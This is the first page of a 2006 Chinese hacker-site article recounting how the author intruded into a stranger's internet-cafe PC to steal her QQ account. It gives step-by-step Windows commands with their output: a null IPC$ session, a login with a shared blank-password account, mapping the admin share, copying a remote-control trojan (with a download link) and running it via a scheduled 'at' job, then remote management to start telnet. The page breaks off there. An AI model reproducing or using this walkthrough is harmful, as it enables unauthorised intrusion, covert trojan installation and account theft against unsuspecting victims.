黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> QQ 主 题 >> QQ黑客 >> 正文
·完美空间提供500M免费AS04-10·企业安全之YY内网准入以04-09
·企业安全之意识与策略04-09·剑走偏锋:IIS漏洞利用04-09
·我来免费网提供100M免费04-09·1122mb.com提供20G超大免04-08
·映像劫持与反劫持技术04-07·让所有"暴力删除工具"无04-07
·入侵88red系统的详细过程04-07·Sql Injection脚本注入终04-07
·vbs+delphi 反弹后门生成04-07·飞讯网提供100MB免费PHP04-07
·突破SQL注入攻击时输入框04-04·结合内核和病毒技术的最04-04
·Real Player rmoc3260.d04-04·亿万网络今月最后为您提04-04
·php+mysql 5 sql inject04-03·Real Player rmoc3260.d04-03
·oblog文件下载漏洞04-03·免费啦提供1G-2G免费全能04-03
·完全解析网页后门和挂马04-02·一句话开3389(只测试过04-02
·萧萧免费空间网提供100M04-02·谷道免费空间网提供1G免04-01
·从本地入手解决双线路由03-31·sablog 1.6 多个跨站漏洞03-31
·富文本编辑器的跨站脚本03-31·Cookie注入是怎样产生的03-31
[组图]亲身经验如何盗取QQ号(图)
      ★★★

亲身经验如何盗取QQ号(图)

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-7-7 9:30:37
    好久都没来网吧了,今天一朋友来找我。外面有下着雪,实在没地方玩,又给溜进了网吧……

  在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化……

  这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了……

  无意的看到13号坐着两MM,嘻.……入侵也由此开始了,看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.这样比较安全点..)

  打开偶可爱的CMD..先net name下看看本机情况

  WANGLU05

  USER2000

  命令成功完成。

  我本机名是WANGLU05.ping下看看IP有无什么规则

  Pinging wanglu05 [192.168.0.13] with 32 bytes of data:

  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

  IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5.

  这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了.

  Pinging WANGLU13 [192.168.0.225] with 32 bytes of data:

  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

  得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....

  net use //192.168.0.225/ipc$ "" /user:"" 空连接成功..说明ipc$默认共享还在...

  只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子.

  G:/>net use //192.168.0.225/ipc$ "" /user:"user04"

  命令成功完成。


如图1.
网吧系统盘为G盘.接着映射对方G盘为我本地Z盘.

  G:/>net use z: //192.168.0.225/g$

  命令成功完成。


如图2

  现在我的电脑里多了一个Z盘...图3.


  现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了...

  这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....

  下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个

  web控制台.体积没多大,205KB..下面是关于webserver的介绍./../

  web控制台

  一个直接在IE栏里输入对方IP就可以控制对方机器的小软件,也就是所谓的B/S模式的控制。 用起来很方便,对方运行了服务端后,你在IE栏里直接输入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。

  可以在我网络盘里下到

  http://fhod.ys168.com

  综合工具里有个 webserver.rar

  接着

  G:/>copy webserver.exe //192.168.0.225/admin$

  已复制 1 个文件。

  G:/>net time //192.168.0.225

  //192.168.0.225 的当前时间是 2005/2/5 下午 05:00

  命令成功完成。

  


图4


  G:/>at //192.168.0.225 17:02 webserver.exe

用AT命令启动webserver.exe.

  2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...

  FT....我说那.

  难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..

  还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...

  打开控制面板--管理工具--计算机管理

  操作-连接到另一计算机.

  然后输入IP192.168.0.225


图5


  呵.等一会就可以看到成功了...你看到了什么?

  更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.

[1] [2] 下一页

文章录入:sygbox    责任编辑:sygbox 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886